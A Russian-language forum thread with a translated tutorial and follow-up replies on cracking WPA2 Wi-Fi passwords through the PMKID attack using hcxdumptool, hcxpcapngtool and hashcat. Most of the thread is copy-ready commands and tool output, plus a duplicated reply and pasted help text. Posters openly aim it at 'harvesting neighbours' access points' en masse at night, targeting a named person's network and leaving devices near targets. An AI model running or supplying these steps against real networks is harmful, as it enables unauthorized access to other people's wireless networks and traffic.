WiFi Брут WPA2 без handshake используя PMKID + hashcat

[admin]

Брут WPA2 без handshake используя PMKID + hashcat

RSN IE - это необязательное поле, которое можно найти в рамах управления 802.11. Одной из возможностей RSN является PMKID. PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции. Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки.

Мы получаем все необходимые данные в первом кадре EAPOL из AP.


Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в IE RSN (надежный сетевой информационный элемент безопасности) одного кадра EAPOL.

В настоящее время мы не знаем, для каких поставщиков или для какого количества маршрутизаторов этот метод будет работать, но мы думаем, что он будет работать против всех сетей 802.11i / p / q / r с включенными функциями роуминга (большинство современных маршрутизаторов).

Основными преимуществами этой атаки являются следующие:

• Больше не требуется регулярных пользователей - потому что злоумышленник напрямую связывается с AP (иначе говоря, «без клиента»)
• Больше не нужно ждать полного 4-стороннего рукопожатия между обычным пользователем и AP
• Отсутствие ретрансмиссии кадров EAPOL (что может привести к результатам, которые невозможно устранить)
• Исключает неверные пароли, посланные обычным пользователем
• Больше нет потерянных кадров EAPOL, когда обычный пользователь или AP находится слишком далеко от злоумышленника
• Больше не требуется фиксировать значения nonce и replaycounter (что приводит к чуть более высоким скоростям)
• Больше нет специального формата вывода (pcap, hccapx и т. Д.) - окончательные данные будут отображаться как обычная строка с шестнадцатеричным кодированием

Нам потребуются:

• hcxdumptool v4.2.0 или выше
• hcxtools v4.2.0 или выше
• hashcat v4.2.0 или выше

Производим атаку:
1.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Ждем, пока в выводе не увидим что-то подобное:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

2.
Переводим в нужный формат и скармливаем наш файл хэшкэту (да-да, по прежнему нужно брутить, так что пока не как с WEP)

$ ./hcxpcaptool -z test.16800 test.pcapng

Собственно на этом всё. Думаю это значительно облегчит брут точек с клиентскими устройствами, находящимися вне диапазона атакующего, а также откроет возможность быстрого сбора хэндшейков с пустых сетей в любых интересующих местах. Пишите, какие роутеры поддаются на практике, а то возможности протестировать пока нет. Осмелюсь также предположить, что в перспективе данная уязвимость будет лечиться обновлением прошивки на AP.

Оригинал статьи (советую почитать, я перевёл только основное) - https://hashcat.net/forum/thread-7717.html

 

[pixe1]

видео по установке и применению -

отличный вектор особенно при загруженном эфире или большом расстоянии до атакуемой точки ( когда есть большой шанс потери EAPOL фрэмов )

 

[jo-jo-jo]

Метод рабочий! Пробовал!

 

[jo-jo-jo]

--enable_status
обычно какой ставят???

 

[MegaV0lt!]

Отличная новость!)) Больше нет необходимости дропать малину не далеко от интересующей точки. Теперь можно просто пройти мимо, имея данный девайс в кармане

 

[Фантомас]

Метод, пожалуй, самый быстрый для добычи соседских точек в округе. Статейка устарела, обновлю. Свою писать лень. Лучше вместо этого буду в других темах флудить! ))) Ха-ха. Ладно, приступаем... Итак, анскил мутит гайды (с) )))

Вчера лично проверил метод на Debian 12, вывожу команды с минимум пояснений, пошагово.
Ставим утилиты, но сначала обновляемся

sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y
sudo apt-get install hcxdumptool hcxtools -y

Убиваем все лишние процессы обязательно, чтобы не мешали работе

sudo airmon-ng check kill

Смотрим название нашего интерфейса командой

sudo iwconfig

И запускаем сбор всего и вся в округе, насколько тянет адаптер и антенна. В выходной файл будут лететь и хэндшейки и PMKIDы

sudo hcxdumptool -o /home/fantomas/pmkid.pcapng -i wlan -t 240 --active_beacon --enable_status 31

Сутки хватит, лучше на ночь. При этом будет твориться в эфире Wi-Fi полный хаос, сами понаблюдаете. Поэтому лучше когда все спят, типа )
Этот файл уже можно закидывать на онлайн сервисы брута и надеяться на удачу, а она непременно будет.
Далее для опытных, кто поставил себе на линь драйвера видекарты и кота. Конвертируем наш файл под работу с hashcat

hcxpcapngtool -o hash.hc22000 pmkid.pcapng

Можно почистить от дубликатов, но надо знать что оставить (Я не знаю )

cat hash.hc22000 | sort -t "*" -k 6,6 -u > hash.hc22000.uniq

Cмотрим, что мы наловили и есть ли там та девушка Лида, которая на улице Южной живёт )))

hcxhashtool -info=stdout -i hash.hc22000

Ну и погнали брут, если не жалко ноутбука

sudo hashcat -a 0 D 1,2 --hwmon-temp-abort=95 -m 22000 /home/fantomas/hash.hc22000.uniq -w 4 /home/fantomas/sosedloh.txt -o "pass.txt"

 

[ERRORx1x]

Метод, пожалуй, самый быстрый для добычи соседских точек в округе. Статейка устарела, обновлю. Свою писать лень. Лучше вместо этого буду в других темах флудить! ))) Ха-ха. Ладно, приступаем... Итак, анскил мутит гайды (с) )))

Вчера лично проверил метод на Debian 12, вывожу команды с минимум пояснений, пошагово.
Ставим утилиты, но сначала обновляемся

sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y
sudo apt-get install hcxdumptool hcxtools -y

Убиваем все лишние процессы обязательно, чтобы не мешали работе

sudo airmon-ng check kill

Смотрим название нашего интерфейса командой

sudo iwconfig

И запускаем сбор всего и вся в округе, насколько тянет адаптер и антенна. В выходной файл будут лететь и хэндшейки и PMKIDы

sudo hcxdumptool -o /home/fantomas/pmkid.pcapng -i wlan -t 240 --active_beacon --enable_status 31

Сутки хватит, лучше на ночь. При этом будет твориться в эфире Wi-Fi полный хаос, сами понаблюдаете. Поэтому лучше когда все спят, типа )
Этот файл уже можно закидывать на онлайн сервисы брута и надеяться на удачу, а она непременно будет.
Далее для опытных, кто поставил себе на линь драйвера видекарты и кота. Конвертируем наш файл под работу с hashcat

hcxpcapngtool -o hash.hc22000 pmkid.pcapng

Можно почистить от дубликатов, но надо знать что оставить (Я не знаю )

cat hash.hc22000 | sort -t "*" -k 6,6 -u > hash.hc22000.uniq

Cмотрим, что мы наловили и есть ли там та девушка Лида, которая на улице Южной живёт )))

hcxhashtool -info=stdout -i hash.hc22000

Ну и погнали брут, если не жалко ноутбука

sudo hashcat -a 0 D 1,2 --hwmon-temp-abort=95 -m 22000 /home/fantomas/hash.hc22000.uniq -w 4 /home/fantomas/sosedloh.txt -o "pass.txt"

В новых версиях hcxdumptool уже не поддерживается часть команд. И можно ли атаковать одну конкретную цель, а не работать по площади? Сдается мне, что без изначального поиска BSSID с помощью airodump-ng не обойтись, но и он находит не все ESSID правильно указывает. Кстати довольно не плохо справляются с задачей bettercap и airgeddon.

 

[Фантомас]

В новых версиях hcxdumptool уже не поддерживается часть команд.

Я не знаю о каких версиях ты говоришь. У меня всё из репозитрий Debian 12 отлично работает как я написал здесь. Может ты путаешь старую версию, про которую писал в топике админ с моей обновлённой инструкцией - то тогда да, там всё было по другому, и установка пакетов и команды.

И можно ли атаковать одну конкретную цель, а не работать по площади?

Предпочитаю работать топором, а не скальпелем ) Какой в этом смысл? Меньше шума в эфире?
Лишнее удаляется из файла вывода и оставляешь хоть одну, хоть сколько тебе надо целей для дальнейшего брута.

 

[174region174]

Я не знаю о каких версиях ты говоришь. У меня всё из репозитрий Debian 12 отлично работает как я написал здесь. Может ты путаешь старую версию, про которую писал в топике админ с моей обновлённой инструкцией - то тогда да, там всё было по другому, и установка пакетов и команды.
Поэтому стоило бы сначала попробовать самому на практике, а потом выезжать с предъявами, что я, мол, фуфел пиханул.

У меня на компе установлена относительно свежая версия. Там и синтаксис для запуска другой. Просто я раньше ещё несколько лет назад пользовался этой штукой. Отличия есть.

Спойлер: help

hcxdumptool 6.3.5 (C) 2024 ZeroBeat
usage: hcxdumptool <options>

most common options:
--------------------
-i <INTERFACE> : name of INTERFACE to be used
default: first suitable INTERFACE
warning:
hcxdumptool changes the mode of the INTERFACE
hcxdumptool changes the virtual MAC address of the INTERFACE
hcxdumptool changes the channel of the INTERFACE
-w <outfile> : write packets to a pcapng-format file named <outfile>
existing file will be overwritten
default outfile name: yyyyddmmhhmmss-interfacename.pcapng
existing file will not be overwritten
get more information: https://pcapng.com/
-c <digit> : set channel (1a,2a,36b,...)
default: 1a,6a,11a
important notice: channel numbers are not unique
it is mandatory to add band information to the channel number (e.g. 12a)
band a: NL80211_BAND_2GHZ
band b: NL80211_BAND_5GHZ
band c: NL80211_BAND_6GHZ
band d: NL80211_BAND_60GHZ
band e: NL80211_BAND_S1GHZ (902 MHz)
to disable frequency management, set this option to a single frequency/channel
-f <digit> : set frequency (2412,2417,5180,...)
-F : use all available frequencies from INTERFACE
-t <second> : minimum stay time (will increase on new stations and/or authentications)
default 1 seconds
-A : ACK incoming frames
INTERFACE must support active monitor mode
-L : show INTERFACE list and terminate
-l : show INTERFACE list (tabulator separated and greppable) and terminate
-I <INTERFACE> : show detailed information about INTERFACE and terminate
--bpfc=<filter>: compile Berkeley Packet Filter (BPF) and exit
$ hcxdumptool --bpfc="wlan addr3 112233445566" > filter.bpf
see man pcap-filter
--bpf=<file> : input Berkeley Packet Filter (BPF) code (maximum 4096 instructions) in tcpdump decimal numbers format
see --help for more information
-h : show this help
-v : show version

less common options:
--------------------
-m <INTERFACE> : set monitor mode and terminate
--disable_deauthentication: do not transmit DEAUTHENTICATION/DISASSOCIATION frames
--disable_proberequest : do not transmit PROBEREQUEST frames
--disable_association : do not AUTHENTICATE/ASSOCIATE
--disable_reassociation : do not REASSOCIATE a CLIENT
--disable_beacon : disable internal BEACON
default: one BEACON/second to wildcard SSID
--proberesponsetx=<digit> : transmit n PROBERESPONSEs from the ESSID ring buffer
default: 5
--essidlist=<file> : initialize ESSID list with these ESSIDs
--errormax=<digit> : set maximum allowed ERRORs
default: 100 ERRORs
--watchdogmax=<seconds> : set maximum TIMEOUT when no packets received
default: 600 seconds
--attemptclientmax=<digit>: set maximum of attempts to request an EAPOL M2
default: 10 attempts
to disable CLIENT attacks set 0
--attemptapmax=<digit> : set maximum of received BEACONs to request a PMKID or to get a 4-way handshake
default: stop after 4 received BEACONs
attemptapmax=0 include this options:
disable_deauthentication: do not transmit DEAUTHENTICATION/DISASSOCIATION frames
disable_proberequest : do not transmit PROBEREQUEST frames
disable_association : do not AUTHENTICATE/ASSOCIATE
disable_reassociation : do not REASSOCIATE a CLIENT
--tot=<digit> : enable timeout timer in minutes
--exitoneapol=<type> : exit on first EAPOL occurrence:
bitmask:
1 = PMKID (from AP)
2 = EAPOL M2M3 (authorized)
4 = EAPOL M1M2/M1M2ROGUE (not authorized)
8 = EAPOL M1
target BPF filter is recommended
--onsigterm=<action> : action when the program has been terminated (poweroff, reboot)
poweroff: power off system
reboot: reboot system
--ongpiobutton=<action> : action when the program has been terminated (poweroff, reboot)
poweroff: power off system
reboot: reboot system
--ontot=<action> : action when the program has been terminated (poweroff, reboot)
poweroff: power off system
reboot: reboot system
--onwatchdog=<action> : action when the program has been terminated (poweroff, reboot)
poweroff: power off system
reboot: reboot system
--onerror=<action> : action when the program has been terminated (poweroff, reboot)
poweroff: power off system
reboot: reboot system
--gpio_button=<digit> : Raspberry Pi GPIO pin number of button (2...27)
push GPIO button (> 10 seconds) to terminate program
default: 0 (GPIO not in use)
--gpio_statusled=<digit> : Raspberry Pi GPIO number of status LED (2...27)
default: 0 (GPIO not in use)
--nmea_dev=<NMEA device> : open NMEA device (/dev/ttyACM0, /dev/tty/USB0, ...)
baudrate = BD9600
--gpsd : use gpsd to get position
gpsd will be switched to NMEA0183 mode
--nmea_out=<outfile> : write GPS information to a nmea-format file named <outfile>
default outfile name: yyyymmddhhmmss.nmea
output: NMEA 0183 standard messages:
$GPRMC: Position, velocity, time and date
$GPGGA: Position, orthometric height, fix related data, time
$GPWPL: Position and MAC AP
$GPTXT: ESSID in HEX ASCII
use gpsbabel to convert to other formats:
gpsbabel -w -t -i nmea -f in_file.nmea -o gpx -F out_file.gpx
gpsbabel -w -t -i nmea -f in_file.nmea -o kml -F out_file.kml
get more information: https://en.wikipedia.org/wiki/NMEA_0183
--nmea_pcapng : write GPS information to pcapng dump file
--rcascan=<character> : do (R)adio (C)hannel (A)ssignment scan only
default = passive scan
a = active scan
p = passive scan
packets are not stored to dump file
not in combination with attack modes
--rds=<digit> : sort real time display
attack mode:
default: sort by time (last seen on top)
1 = sort by status (last PMKID/EAPOL on top)
scan mode:
1 = sort by PROBERESPONSE count
Columns:
R = + AP display : AP is in TX range or under attack
S = + AP display : AUTHENTICATION KEY MANAGEMENT PSK
P = + AP display : got PMKID hashcat / JtR can work on
1 = + AP display : got EAPOL M1 (CHALLENGE)
3 = + AP display : got EAPOL M1M2M3 or EAPOL M1M2M3M4 (AUTHORIZATION) hashcat / JtR can work on
E = + CLIENT display : got EAP-START MESSAGE
2 = + CLIENT display : got EAPOL M1M2 (ROGUE CHALLENGE) hashcat / JtR can work on
--help : show additional help (example and trouble shooting)
--version : show version

А это команда для запуска

hcxdumptool -i wlan0 -F -w '/home/kali/Downloads/pmkid/test.pсapng'

 

[Фантомас]

hcxdumptool 6.2.6 (C) 2022 ZeroBeat

Всё понятно. В Kali в репах стоят версии новее, чем в Debian.